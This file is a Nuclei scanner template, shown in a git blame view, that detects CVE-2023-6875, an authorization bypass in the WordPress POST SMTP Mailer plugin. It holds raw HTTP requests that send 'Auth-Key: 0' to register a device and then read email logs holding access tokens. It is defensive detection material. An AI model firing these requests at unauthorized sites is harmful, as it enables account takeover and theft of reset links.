nuclei-templates/http/cves/2023/CVE-2023-6875.yaml

67 lines
2.6 KiB
YAML
Raw Normal View History

2024-01-17 05:48:19 +00:00
id: CVE-2023-6875
info:
name: WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The POST SMTP Mailer Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.
remediation: Fixed in 2.8.8
2024-01-17 05:48:19 +00:00
reference:
- https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Mobile/includes/rest-api/v1/rest-api.php#L60
- https://plugins.trac.wordpress.org/changeset/3016051/post-smtp/trunk?contextall=1&old=3012318&old_path=%2Fpost-smtp%2Ftrunk
- https://www.wordfence.com/threat-intel/vulnerabilities/id/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2023-6875
2024-01-17 06:06:43 +00:00
- https://github.com/UlyssesSaicha/CVE-2023-6875
2024-01-17 05:48:19 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6875
cwe-id: CWE-862
epss-score: 0.04263
epss-percentile: 0.92089
cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:*
2024-01-17 05:48:19 +00:00
metadata:
verified: true
max-request: 3
vendor: wpexperts
product: post_smtp_mailer
framework: wordpress
2024-01-17 05:48:19 +00:00
publicwww-query: "/wp-content/plugins/post-smtp"
tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass
2024-01-17 05:48:19 +00:00
variables:
fcm_token: "{{randstr_1}}"
device: "{{randstr_2}}"
http:
- raw:
- |
POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
Host: {{Hostname}}
Auth-Key: 0
Device: {{device}}
Fcm-Token: {{fcm_token}}
Content-Type: application/x-www-form-urlencoded
- |
POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
Host: {{Hostname}}
Auth-Key: 0
Device: {{device}}
Fcm-Token: {{fcm_token}}
Content-Type: application/x-www-form-urlencoded
- |
GET /wp-json/post-smtp/v1/get-log HTTP/1.1
Host: {{Hostname}}
Auth-Key: 0
Device: {{device}}
Fcm-Token: {{fcm_token}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_2, "success\":true,", "{\"fcm_token\":\"{{fcm_token}}")'
- 'contains_all(body_3, "true,\"data\":", "access_token=")'
condition: and
# digest: 4a0a00473045022100df1311e0648c5c0c2297cad9b5527b9c111d611cf4b9f990fdea564c1ff5c4cc02202ce1f58dc34dd57604eef2926b33b969069290c0f03ffabb7af0be0f90fea60c:922c64590222798bb761d5b6d8e72950